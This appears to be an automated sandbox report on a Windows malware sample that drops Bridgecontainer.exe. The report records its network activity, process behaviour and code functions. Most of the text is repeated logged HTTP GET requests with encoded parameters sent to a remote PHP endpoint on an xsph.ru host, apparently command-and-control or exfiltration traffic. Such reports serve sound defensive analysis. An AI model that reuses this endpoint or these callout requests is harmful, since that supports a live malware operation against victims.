5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=d1nIiojI0EWZiVTYzATYmVWZlRjZlRWZwgzY4ITOhdTY3EWOmJmIsIiZ4MjZxIzNhBzYxgzN4cTOiN2M3YWNhNGMzUjM5YDOyAjZjFDN5cjNiojImdTNyEWO4EDO1gTM0AjZmNjM5MjN2YmNyUzM3UDM1MjIsIiNkZ2N4EjM0MmM3MDZkNTMmNTM4IGMkJmYhJDOlVjNzMjZ1UmYiFWZiojIxYWY5UmYjNDM5YTZzATZlV2M0czY0EWNhRjYxcjY4UmI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETplUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: f1069581.xsph.ru
            Source: Bridgecontainer.exe, 00000005.00000002.4473483339.0000000002D63000.00000004.00000800.00020000.00000000.sdmp, Bridgecontainer.exe, 00000005.00000002.4473483339.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp, Bridgecontainer.exe, 00000005.00000002.4473483339.0000000002EFF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f1069581.xsph.ru
            Source: Bridgecontainer.exe, 00000005.00000002.4473483339.0000000002B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f1069581.xsph.ru/
            Source: Bridgecontainer.exe, 00000005.00000002.4473483339.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, Bridgecontainer.exe, 00000005.00000002.4473483339.0000000002D63000.00000004.00000800.00020000.00000000.sdmp, Bridgecontainer.exe, 00000005.00000002.4473483339.0000000002BC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f1069581.xsph.ru/L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr
            Source: Bridgecontainer.exe, 00000005.00000002.4473483339.0000000002B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

            System Summary

            barindex
            Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: 0_2_0059718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_0059718C
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: 0_2_0059857B0_2_0059857B
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: 0_2_0059407E0_2_0059407E
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: 0_2_005BD00E0_2_005BD00E
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: 0_2_005A70BF0_2_005A70BF
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: 0_2_005C11940_2_005C1194
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: 0_2_005B02F60_2_005B02F6
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: 0_2_005932810_2_00593281
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: 0_2_0059E2A00_2_0059E2A0
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: 0_2_005A66460_2_005A6646
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: 0_2_005B070E0_2_005B070E
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: 0_2_005B473A0_2_005B473A
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: 0_2_005A37C10_2_005A37C1
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: 0_2_005927E80_2_005927E8
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: 0_2_0059E8A00_2_0059E8A0
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: 0_2_0059F9680_2_0059F968
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: 0_2_005B49690_2_005B4969
            Source: C:\Users\user\Desktop\5Ixz5yVfS7.exeCode function: 0_2_005A6A7B0_2_005A6A7B
